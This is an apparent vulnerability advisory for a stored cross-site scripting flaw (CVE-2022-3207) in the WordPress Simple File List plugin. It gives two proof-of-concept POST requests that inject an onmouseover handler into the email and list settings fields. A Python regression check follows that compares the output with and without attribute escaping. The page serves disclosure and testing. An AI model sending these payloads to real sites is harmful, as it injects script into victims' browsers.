Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting. The first XSS is in the email settings and the second is in the list settings.
Title | Published | Views | Family |
---|---|---|---|
CVE-2022-3207 Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting | 10 Oct 2022 00:00 | – | cvelist |
WordPress Simple File List plugin <= 4.4.11 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability | 19 Sep 2022 00:00 | – | patchstack |
Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting | 19 Sep 2022 00:00 | – | wpvulndb |
WordPress Simple File List Cross-Site Scripting Vulnerability | 12 Oct 2022 00:00 | – | cnvd |
CVE-2022-3207 | 10 Oct 2022 21:15 | – | nvd |
CVE-2022-3207 | 10 Oct 2022 21:15 | – | cve |
Cross site scripting | 10 Oct 2022 21:15 | – | prion |
# First Stored XSS - HTTP Request
```http
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
...
...
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE
```
+++++++++++++++++++++++
# Second Stored XSS - HTTP Request
```http
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
...
...
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE
```
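The submitted values in both requests close a double-quoted attribute and append an event handler. The regression check below is an added example, not code from the plugin or the original report: it renders each field with and without attribute escaping and lists any attributes the value managed to inject. It assumes the saved settings are echoed into a `value="..."` attribute (the page does not show the plugin's template); `render_field`, `audit` and the sample body are constructed for illustration, and `html.escape` stands in for WordPress's `esc_attr()`.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Constructed sample: three fields taken from the two request bodies on this page.
SAMPLE_BODY = (
    "eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a"
    "&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a"
    "&eeSortBy=DateMod"
)

class AttrCollector(HTMLParser):
    """Records the attribute names an HTML parser sees on each start tag."""
    def __init__(self):
        super().__init__()
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.attr_names.extend(name for name, _ in attrs)

def render_field(name, value, escape):
    # Assumed sink: the stored setting is echoed into a double-quoted value attribute.
    shown = html.escape(value, quote=True) if escape else value
    return f'<input type="text" name="{name}" value="{shown}">'

def injected_attributes(markup):
    """Return attributes beyond the three the template itself emits."""
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return [a for a in parser.attr_names if a not in ("type", "name", "value")]

def audit(body, escape):
    """Map each submitted field to the attributes its value managed to inject."""
    report = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        extra = injected_attributes(render_field(name, value, escape))
        if extra:
            report[name] = extra
    return report

if __name__ == "__main__":
    print("unescaped:", audit(SAMPLE_BODY, escape=False))
    print("escaped:  ", audit(SAMPLE_BODY, escape=True))
```

The same audit can be pointed at rendered admin pages after upgrading to confirm that no settings field yields extra attributes.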